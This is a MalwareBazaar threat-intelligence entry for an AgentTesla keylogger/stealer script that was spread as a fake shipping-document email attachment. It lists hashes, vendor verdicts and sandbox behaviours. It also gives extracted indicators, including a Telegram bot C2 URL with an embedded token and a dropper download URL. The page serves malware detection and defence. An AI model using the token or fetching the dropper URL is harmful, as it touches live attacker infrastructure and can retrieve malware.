MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

AgentTesla

Vendor detections: 9

Intelligence 9 IOCs YARA File information Comments

SHA256 hash:	73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812
SHA3-384 hash:	b2d08ed14b1bb655bcfb62ca42ef44b1a7ccfb70e92033a5d3d91dadae1dc769223d8ba47581e53dc46485990085de57
SHA1 hash:	4ebb9876723c2fc5fda46b098094cf0104efac55
MD5 hash:	3b970c76dbc74cd9b119f487a22c1683
humanhash:	fifteen-west-winter-burger
File name:	z1ShippingDocs_waybillNO2005xxx351.wsf
Download:	download sample
Signature	AgentTesla Create hunting rule
File size:	193'844 bytes
First seen:	2025-01-28 07:30:06 UTC
Last seen:	Never
File type:
MIME type:	text/xml
ssdeep	3072:z/zQ6Vv//riU/tEqZjCwNZiU/tEyWiU/tEqZjCwNZiU/tEAI6:0U/tESLNQU/tEylU/tESLNQU/tEa
TLSH	T1DF146B896645DAD647733A74802F2706BDD8CA132D28E0A478DFCBE13774994E2F3678
TrID	50.0% (.WSF) Windows Script File (8000/1/2) 31.2% (.XML) Generic XML (ASCII) (5000/1) 18.7% (.HTML) HyperText Markup Language (3000/1/1)
Magika	txt
Reporter	FXOLabs
Tags:	AgentTesla wsf

Intelligence

File Origin

# of uploads :

# of downloads :

100

Origin country :

Vendor Threat Intelligence

Detection(s):

Sanesecurity.Malware.27112.JsHeur.UNOFFICIAL

Sanesecurity.Malware.25834.JsHeur.UNOFFICIAL

Verdict:

Malicious

Score:

94.9%

Link:

https://cyber-fortress.com/docs/result/index.php?id=67988cac09fca62779639363

Tags:

xtreme shell overt

Verdict:

Suspicious

Threat level:

5/10

Confidence:

100%

Tags:

masquerade obfuscated

Link:

https://www.filescan.io/uploads/679887b6c61f1594ee693ee2/reports/92b29f1d-0229-4bd4-8d60-6bc78a433237/overview

Verdict:

Suspicious

Labled as:

Trojan.Script.ExpKit

Link:

https://www.hybrid-analysis.com/sample/73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812

Result

Verdict:

MALICIOUS

Details

Base64 Encoded Powershell Directives

Detected one or more base64 encoded Powershell directives.

Base64 Encoded URL

Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.

Result

Threat name:

n/a

Detection:

suspicious

Classification:

n/a

Score:

23 / 100

Link:

https://www.joesandbox.com/analysis/1601200

Signature

Potential malicious VBS script found (has network functionality)

Behaviour

Behavior Graph:

Download SVG

Score:

34%

Verdict:

Susipicious

File Type:

SCRIPT

Link:

https://malprob.io/report/73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812/

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=oo3duwpkhrog6beued5xussnyturanwcjyvsloxea2vmd5lkdaja._file

Result

Malware family:

agenttesla

Score:

10/10

Tags:

family:agenttesla collection discovery execution keylogger persistence spyware stealer trojan

Link:

https://tria.ge/reports/250128-ng5awszmhn/

Behaviour

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

outlook_win_path

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of SetThreadContext

Accesses Microsoft Outlook profiles

Adds Run key to start application

Checks computer location settings

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

AgentTesla

Agenttesla family

Malware Config

C2 Extraction:

https://api.telegram.org/bot6050556352:AAE_-mublQ2CllMbT9xkQVBjSBbdvdYR1kM/

Dropper Extraction:

https://res.cloudinary.com/daxwua63y/image/upload/v1737543662/new_image_h8btwc.jpg%20

Please note that we are no longer able to provide a coverage score for Virus Total.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

AgentTesla

73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812

(this sample)

Delivery method

Distributed via e-mail attachment

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

No comments found for this malware sample